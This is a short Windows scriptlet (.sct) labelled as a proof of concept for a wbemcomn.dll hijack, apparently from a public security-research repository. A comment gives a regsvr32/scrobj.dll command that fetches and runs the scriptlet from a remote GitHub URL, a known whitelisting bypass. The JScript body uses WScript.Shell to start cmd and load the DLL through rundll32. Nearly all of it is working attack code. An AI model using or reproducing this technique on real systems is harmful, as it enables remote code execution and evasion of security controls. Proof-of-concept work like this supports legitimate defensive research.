<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Wbemcomn-DLL-Hijack-POC"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">

<!-- Command: regsvr32 /s /n /u /i:https://raw.githubusercontent.com/greycel/pocs/master/wbemcomn01.sct scrobj.dll -->

<![CDATA[   
var r = new ActiveXObject("WScript.Shell").Run("cmd /k 'rundll32.exe shell32.dll,Control_RunDLL \\127.0.0.1\C$\Windows\System32\wbem\wbemcomn.dll'"); 
]]>
 
</script>
</registration>
</scriptlet>
